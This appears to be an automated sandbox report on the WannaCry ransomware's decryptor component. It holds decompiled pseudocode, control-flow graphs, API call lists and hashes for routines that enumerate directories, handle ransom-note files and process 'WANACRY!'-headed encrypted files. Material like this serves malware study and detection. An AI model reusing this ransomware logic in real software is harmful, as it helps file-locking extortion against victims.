                                                      control_flow_graph 334 4026b0-40274b call 40c8f0 * 2 swprintf FindFirstFileW 339 4027b4-4027bc 334->339 340 40274d-4027af call 402e00 #825 call 402e00 #825 334->340 342 4027c2-4027ca 339->342 356 402ace-402ae4 340->356 344 4027d4-4027e8 wcscmp 342->344 345 4027cc-4027ce 342->345 348 40295d-402972 FindNextFileW 344->348 349 4027ee-402802 wcscmp 344->349 345->344 347 402978-40298b FindClose 345->347 351 4029b9-4029c1 347->351 352 40298d-402995 347->352 348->342 348->347 349->348 353 402808-402838 swprintf GetFileAttributesW 349->353 354 4029c3-4029cb 351->354 355 4029ef-402a4d swprintf DeleteFileW swprintf DeleteFileW 351->355 357 402997-402999 352->357 358 40299b-4029a0 352->358 359 4028b6-4028ca wcscmp 353->359 360 40283a-402850 call 402af0 353->360 362 4029d1-4029d6 354->362 363 4029cd-4029cf 354->363 364 402a6a-402a92 #825 355->364 365 402a4f-402a64 call 402e90 355->365 357->351 357->358 367 4029a2 358->367 368 4029a7-4029b7 call 402560 358->368 359->348 361 4028d0-4028e4 wcscmp 359->361 360->348 380 402856-4028b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 360->380 361->348 369 4028e6-4028fa wcscmp 361->369 370 4029d8 362->370 371 4029dd-4029ed call 4026b0 362->371 363->355 363->362 374 402a94-402ab8 call 402d90 call 402e90 364->374 375 402aba-402acd #825 364->375 386 402a66 365->386 367->368 368->351 368->352 369->348 377 4028fc-402953 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 369->377 370->371 371->354 371->355 374->375 375->356 391 402957 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 377->391 380->391 386->364 391->348
                                                      C-Code - Quality: 74%
                                                      			E004026B0(void* __ecx) {
                                                      				void* _t109;
                                                      				intOrPtr* _t110;
                                                      				int _t111;
                                                      				void* _t115;
                                                      				intOrPtr* _t116;
                                                      				intOrPtr* _t123;
                                                      				intOrPtr _t124;
                                                      				char _t125;
                                                      				intOrPtr* _t129;
                                                      				intOrPtr* _t131;
                                                      				intOrPtr* _t135;
                                                      				int _t139;
                                                      				int _t145;
                                                      				int _t146;
                                                      				int _t147;
                                                      				int _t149;
                                                      				int _t154;
                                                      				intOrPtr* _t221;
                                                      				void _t225;
                                                      				intOrPtr* _t226;
                                                      				wchar_t* _t227;
                                                      				intOrPtr* _t228;
                                                      				intOrPtr* _t229;
                                                      				void* _t231;
                                                      				void* _t232;
                                                      				intOrPtr _t234;
                                                      				void* _t235;
                                                      				void* _t236;
                                                      				void* _t237;
                                                      				void* _t238;
                                                      				void* _t239;
                                                      				void* _t240;
                                                      				void* _t242;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041356E);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t234;
                                                      				_t235 = _t234 - 0x56c;
                                                      				_t232 = __ecx;
                                                      				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                                      				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                                      				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                                      				 *(_t235 + 0x584) = 0;
                                                      				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                                      				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                                      				 *((char*)(_t235 + 0x588)) = 1;
                                                      				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                                      				_t236 = _t235 + 0xc;
                                                      				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                                      				 *(_t236 + 0x18) = _t109;
                                                      				if(_t109 != 0xffffffff) {
                                                      					while(1) {
                                                      						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      						if(_t110 != 0 &&  *_t110 != 0) {
                                                      							break;
                                                      						}
                                                      						_t111 = wcscmp(_t236 + 0x358, ".");
                                                      						_t236 = _t236 + 8;
                                                      						if(_t111 != 0) {
                                                      							_t139 = wcscmp(_t236 + 0x358, L"..");
                                                      							_t236 = _t236 + 8;
                                                      							if(_t139 != 0) {
                                                      								_push(_t236 + 0x358);
                                                      								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                                      								_t236 = _t236 + 0x10;
                                                      								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                                      									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                                      									_t236 = _t236 + 8;
                                                      									if(_t145 != 0) {
                                                      										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                                      										_t236 = _t236 + 8;
                                                      										if(_t146 != 0) {
                                                      											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                                      											_t236 = _t236 + 8;
                                                      											if(_t147 != 0) {
                                                      												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      												_t149 = wcslen(_t236 + 0x5c);
                                                      												_t236 = _t236 + 4;
                                                      												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                                      												 *((char*)(_t236 + 0x590)) = 3;
                                                      												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                                      												 *((char*)(_t236 + 0x584)) = 1;
                                                      												_push(1);
                                                      												goto L14;
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                                      										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                                      										_t154 = wcslen(_t236 + 0x5c);
                                                      										_t236 = _t236 + 4;
                                                      										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                                      										 *((char*)(_t236 + 0x590)) = 2;
                                                      										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                                      										 *((char*)(_t236 + 0x584)) = 1;
                                                      										_push(1);
                                                      										L14:
                                                      										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                                      							continue;
                                                      						}
                                                      						break;
                                                      					}
                                                      					FindClose( *(_t236 + 0x20));
                                                      					_t115 =  *(_t236 + 0x18);
                                                      					_t225 =  *_t115;
                                                      					if(_t225 != _t115) {
                                                      						while(1) {
                                                      							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t135 != 0 &&  *_t135 != 0) {
                                                      								goto L22;
                                                      							}
                                                      							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                                      							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                                      								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E00402560(_t232, _t136);
                                                      							_t225 =  *_t225;
                                                      							if(_t225 !=  *(_t236 + 0x18)) {
                                                      								continue;
                                                      							}
                                                      							goto L22;
                                                      						}
                                                      					}
                                                      					L22:
                                                      					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                                      					_t226 =  *_t116;
                                                      					if(_t226 != _t116) {
                                                      						while(1) {
                                                      							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                                      							if(_t131 != 0 &&  *_t131 != 0) {
                                                      								goto L28;
                                                      							}
                                                      							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                                      							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                                      								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                                      							}
                                                      							E004026B0(_t232, _t132);
                                                      							_t226 =  *_t226;
                                                      							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                                      								continue;
                                                      							}
                                                      							goto L28;
                                                      						}
                                                      					}
                                                      					L28:
                                                      					_t227 =  *(_t236 + 0x58c);
                                                      					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                                      					_t237 = _t236 + 0x10;
                                                      					DeleteFileW(_t237 + 0x5c);
                                                      					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                                      					_t238 = _t237 + 0x10;
                                                      					DeleteFileW(_t238 + 0x5c);
                                                      					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					 *((char*)(_t238 + 0x584)) = 0;
                                                      					_t221 = _t123;
                                                      					_t228 =  *_t123;
                                                      					if(_t228 != _t123) {
                                                      						do {
                                                      							_t129 = _t228;
                                                      							_t228 =  *_t228;
                                                      							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                                      						} while (_t228 != _t221);
                                                      						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                                      					}
                                                      					_push(_t123);
                                                      					L00412C98();
                                                      					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                                      					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                                      					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                                      					_t239 = _t238 + 4;
                                                      					_t124 =  *_t229;
                                                      					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                                      					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                                      					if(_t124 != _t229) {
                                                      						do {
                                                      							_push(0);
                                                      							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                                      						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                                      					}
                                                      					_push( *((intOrPtr*)(_t239 + 0x28)));
                                                      					L00412C98();
                                                      					_t240 = _t239 + 4;
                                                      					_t125 = 1;
                                                      				} else {
                                                      					 *((char*)(_t236 + 0x57c)) = 0;
                                                      					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                                      					_push( *((intOrPtr*)(_t236 + 0x10)));
                                                      					L00412C98();
                                                      					_t242 = _t236 + 4;
                                                      					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                                      					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                                      					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                                      					_push( *((intOrPtr*)(_t242 + 0x20)));
                                                      					L00412C98();
                                                      					_t240 = _t242 + 4;
                                                      					_t125 = 0;
                                                      				}
                                                      				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                                      				return _t125;
                                                      			}




































                                                      0x004029a2
                                                      0x004029a2
                                                      0x004029aa
                                                      0x004029af
                                                      0x004029b7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029b7
                                                      0x0040298d
                                                      0x004029b9
                                                      0x004029b9
                                                      0x004029bd
                                                      0x004029c1
                                                      0x004029c3
                                                      0x004029c3
                                                      0x004029cb
                                                      0x00000000
                                                      0x00000000
                                                      0x004029d1
                                                      0x004029d6
                                                      0x004029d8
                                                      0x004029d8
                                                      0x004029e0
                                                      0x004029e5
                                                      0x004029ed
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004029ed
                                                      0x004029c3
                                                      0x004029ef
                                                      0x004029ef
                                                      0x00402a0c
                                                      0x00402a0e
                                                      0x00402a16
                                                      0x00402a2c
                                                      0x00402a2e
                                                      0x00402a36
                                                      0x00402a3c
                                                      0x00402a40
                                                      0x00402a47
                                                      0x00402a49
                                                      0x00402a4d
                                                      0x00402a4f
                                                      0x00402a4f
                                                      0x00402a51
                                                      0x00402a5d
                                                      0x00402a62
                                                      0x00402a66
                                                      0x00402a66
                                                      0x00402a6a
                                                      0x00402a6b
                                                      0x00402a70
                                                      0x00402a74
                                                      0x00402a78
                                                      0x00402a7c
                                                      0x00402a7f
                                                      0x00402a81
                                                      0x00402a8e
                                                      0x00402a92
                                                      0x00402a94
                                                      0x00402a98
                                                      0x00402aaf
                                                      0x00402ab4
                                                      0x00402a94
                                                      0x00402abe
                                                      0x00402abf
                                                      0x00402ac4
                                                      0x00402ac7
                                                      0x0040274d
                                                      0x00402751
                                                      0x00402765
                                                      0x0040276e
                                                      0x0040276f
                                                      0x00402778
                                                      0x0040277b
                                                      0x0040277f
                                                      0x00402790
                                                      0x0040279b
                                                      0x004027a4
                                                      0x004027a5
                                                      0x004027aa
                                                      0x004027ad
                                                      0x004027ad
                                                      0x00402ad7
                                                      0x00402ae4

                                                      APIs
                                                        • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                                      • swprintf.MSVCRT ref: 00402728
                                                      • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                                      • #825.MFC42(?,?,?,?), ref: 0040276F
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                                      • #825.MFC42(?), ref: 004027A5
                                                      • wcscmp.MSVCRT ref: 004027E1
                                                      • wcscmp.MSVCRT ref: 004027FB
                                                      • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                                      • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                                      • wcslen.MSVCRT ref: 0040286E
                                                      • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                                      • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                                      • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                                      • FindClose.KERNEL32(?), ref: 0040297D
                                                        • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                                      • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                                      • API String ID: 1037557366-268640142
                                                      • Opcode ID: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                                      • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                                      • Opcode Fuzzy Hash: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                                      • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 73%
                                                      			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                                      				struct _OVERLAPPED* _v8;
                                                      				char _v20;
                                                      				long _v32;
                                                      				long _v36;
                                                      				union _LARGE_INTEGER* _v40;
                                                      				void _v44;
                                                      				char _v48;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v564;
                                                      				union _LARGE_INTEGER* _v568;
                                                      				void _v572;
                                                      				char _v573;
                                                      				short _v575;
                                                      				intOrPtr _v579;
                                                      				void _v580;
                                                      				struct _FILETIME _v588;
                                                      				struct _FILETIME _v596;
                                                      				struct _FILETIME _v604;
                                                      				void* _v608;
                                                      				void _v612;
                                                      				void _v616;
                                                      				void* _v620;
                                                      				intOrPtr _v624;
                                                      				void* __ebx;
                                                      				void* __ebp;
                                                      				int _t109;
                                                      				int _t113;
                                                      				int _t115;
                                                      				int _t116;
                                                      				int _t118;
                                                      				void* _t119;
                                                      				signed int _t122;
                                                      				signed int _t137;
                                                      				signed int _t139;
                                                      				int _t140;
                                                      				signed int _t141;
                                                      				int _t145;
                                                      				signed int _t148;
                                                      				int _t152;
                                                      				int _t155;
                                                      				void* _t159;
                                                      				intOrPtr _t196;
                                                      				signed int _t212;
                                                      				signed int _t213;
                                                      				void* _t216;
                                                      				intOrPtr _t223;
                                                      				signed int _t224;
                                                      				void* _t226;
                                                      				intOrPtr _t227;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x4158c8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t227;
                                                      				_push(_t212);
                                                      				_v624 = __ecx;
                                                      				_t213 = _t212 | 0xffffffff;
                                                      				_v620 = _t213;
                                                      				_v608 = _t213;
                                                      				_v48 = 0;
                                                      				_v616 = 0;
                                                      				_v580 = 0;
                                                      				_v579 = 0;
                                                      				_v575 = 0;
                                                      				_v573 = 0;
                                                      				_v612 = 0;
                                                      				_v36 = 0;
                                                      				_v32 = 0;
                                                      				_v564 = 0;
                                                      				_v8 = 0;
                                                      				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                      				_v620 = _t159;
                                                      				if(_t159 != _t213) {
                                                      					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                                      					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                                      					__eflags = _t109;
                                                      					if(_t109 == 0) {
                                                      						L32:
                                                      						_push(0xffffffff);
                                                      						_push( &_v20);
                                                      						goto L33;
                                                      					} else {
                                                      						__eflags = 0;
                                                      						asm("repe cmpsd");
                                                      						if(0 != 0) {
                                                      							goto L32;
                                                      						} else {
                                                      							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                                      							__eflags = _t113;
                                                      							if(_t113 == 0) {
                                                      								goto L32;
                                                      							} else {
                                                      								__eflags = _v616 - 0x100;
                                                      								if(_v616 != 0x100) {
                                                      									goto L32;
                                                      								} else {
                                                      									_t223 = _v624;
                                                      									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                                      									__eflags = _t115;
                                                      									if(_t115 == 0) {
                                                      										goto L32;
                                                      									} else {
                                                      										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                                      										__eflags = _t116;
                                                      										if(_t116 == 0) {
                                                      											goto L32;
                                                      										} else {
                                                      											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                                      											__eflags = _t118;
                                                      											if(_t118 == 0) {
                                                      												goto L32;
                                                      											} else {
                                                      												__eflags = _v612 - 3;
                                                      												if(_v612 != 3) {
                                                      													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                                      													_t216 = _t119;
                                                      													_v608 = _t216;
                                                      													__eflags = _t216 - 0xffffffff;
                                                      													if(_t216 != 0xffffffff) {
                                                      														_push( &_v48);
                                                      														_push( &_v560);
                                                      														_t51 = _t223 + 4; // 0x4
                                                      														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                                      														__eflags = _t122;
                                                      														if(_t122 != 0) {
                                                      															L22:
                                                      															_t59 = _t223 + 0x54; // 0x54
                                                      															_push(0x10);
                                                      															_push(_v48);
                                                      															_t196 =  *0x4213b0; // 0x4218b0
                                                      															_push(_t196);
                                                      															_push( &_v560);
                                                      															E0040A150(_t59);
                                                      															_v44 = _v572;
                                                      															_v40 = _v568;
                                                      															while(1) {
                                                      																__eflags = _v40;
                                                      																if(__eflags < 0) {
                                                      																	break;
                                                      																}
                                                      																if(__eflags > 0) {
                                                      																	L26:
                                                      																	_t139 =  *(_t223 + 0x4d0);
                                                      																	__eflags = _t139;
                                                      																	if(_t139 == 0) {
                                                      																		L28:
                                                      																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                                      																		__eflags = _t140;
                                                      																		if(_t140 == 0) {
                                                      																			L34:
                                                      																			_push(0xffffffff);
                                                      																			_push( &_v20);
                                                      																			goto L33;
                                                      																		} else {
                                                      																			_t141 = _v36;
                                                      																			__eflags = _t141;
                                                      																			if(_t141 == 0) {
                                                      																				goto L34;
                                                      																			} else {
                                                      																				_v44 = _v44 - _t141;
                                                      																				asm("sbb dword [ebp-0x24], 0x0");
                                                      																				_t76 = _t223 + 0x54; // 0x54
                                                      																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                                      																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
                                                      																				__eflags = _t145;
                                                      																				if(_t145 == 0) {
                                                      																					goto L32;
                                                      																				} else {
                                                      																					__eflags = _v32 - _v36;
                                                      																					if(_v32 == _v36) {
                                                      																						continue;
                                                      																					} else {
                                                      																						goto L32;
                                                      																					}
                                                      																				}
                                                      																			}
                                                      																		}
                                                      																	} else {
                                                      																		__eflags =  *_t139;
                                                      																		if( *_t139 != 0) {
                                                      																			goto L32;
                                                      																		} else {
                                                      																			goto L28;
                                                      																		}
                                                      																	}
                                                      																} else {
                                                      																	__eflags = _v44;
                                                      																	if(_v44 <= 0) {
                                                      																		break;
                                                      																	} else {
                                                      																		goto L26;
                                                      																	}
                                                      																}
                                                      																goto L41;
                                                      															}
                                                      															_push(0);
                                                      															SetFilePointerEx(_t216, _v572, _v568, 0);
                                                      															SetEndOfFile(_t216);
                                                      															goto L36;
                                                      														} else {
                                                      															_push( &_v48);
                                                      															_push( &_v560);
                                                      															_t56 = _t223 + 0x2c; // 0x2c
                                                      															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                                      															__eflags = _t148;
                                                      															if(_t148 != 0) {
                                                      																_v564 = 1;
                                                      																goto L22;
                                                      															} else {
                                                      																goto L20;
                                                      															}
                                                      														}
                                                      													} else {
                                                      														_push(_t119);
                                                      														_push( &_v20);
                                                      														goto L33;
                                                      													}
                                                      												} else {
                                                      													CloseHandle(_t159);
                                                      													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                                      													_v620 = _t159;
                                                      													__eflags = _t159 - 0xffffffff;
                                                      													if(_t159 == 0xffffffff) {
                                                      														goto L32;
                                                      													} else {
                                                      														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                                      														__eflags = _t152;
                                                      														if(_t152 == 0) {
                                                      															goto L32;
                                                      														} else {
                                                      															__eflags = _v36 - 0x10000;
                                                      															if(_v36 != 0x10000) {
                                                      																goto L32;
                                                      															} else {
                                                      																SetFilePointer(_t159, 0, 0, 0);
                                                      																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                                      																__eflags = _t155;
                                                      																if(_t155 == 0) {
                                                      																	L20:
                                                      																	_push(0xffffffff);
                                                      																	_push( &_v20);
                                                      																	goto L33;
                                                      																} else {
                                                      																	__eflags = _v32 - 0x10000;
                                                      																	if(_v32 != 0x10000) {
                                                      																		goto L20;
                                                      																	} else {
                                                      																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                                      																		SetEndOfFile(_t159);
                                                      																		_t216 = _v608;
                                                      																		L36:
                                                      																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                                      																		__eflags = _v612 - 3;
                                                      																		if(_v612 == 3) {
                                                      																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                                      																			__eflags = _t137;
                                                      																			_v608 = _t137;
                                                      																			_v620 = _t137;
                                                      																			MoveFileW(_a4, _a8);
                                                      																		}
                                                      																		_t224 =  *(_t223 + 0x4d4);
                                                      																		__eflags = _t224;
                                                      																		if(_t224 != 0) {
                                                      																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                                      																		}
                                                      																		_push(0xffffffff);
                                                      																		_push( &_v20);
                                                      																		L00413056();
                                                      																		 *[fs:0x0] = _v20;
                                                      																		return 1;
                                                      																	}
                                                      																}
                                                      															}
                                                      														}
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								}
                                                      							}
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_push(_t213);
                                                      					_push( &_v20);
                                                      					L33:
                                                      					L00413056();
                                                      					 *[fs:0x0] = _v20;
                                                      					return 0;
                                                      				}
                                                      				L41:
                                                      			}

                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                                      • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                                      • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                                      • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                                      • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                                      • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402234
                                                      • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                                      • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                                      • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                                      • _local_unwind2.MSVCRT ref: 00402452
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000001C.00000002.4450384819.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 0000001C.00000002.4450341169.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450550901.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450641363.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450693015.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 0000001C.00000002.4450741084.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_28_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                                      • String ID: WANACRY!
                                                      • API String ID: 1586634678-1240840912
                                                      • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                                      • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                                      • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 75%
                                                      			E004035A0(intOrPtr __ecx) {
                                                      				int _t51;
                                                      				void* _t54;
                                                      				long _t55;
                                                      				signed int _t64;
                                                      				signed int _t68;
                                                      				void* _t71;
                                                      				int _t78;
                                                      				short _t86;
                                                      				signed int _t92;
                                                      				intOrPtr _t110;
                                                      				int _t121;
                                                      				void* _t122;
                                                      				void* _t123;
                                                      				void* _t126;
                                                      				void* _t128;
                                                      				intOrPtr _t129;
                                                      				void* _t130;
                                                      				void* _t132;
                                                      				void* _t134;
                                                      
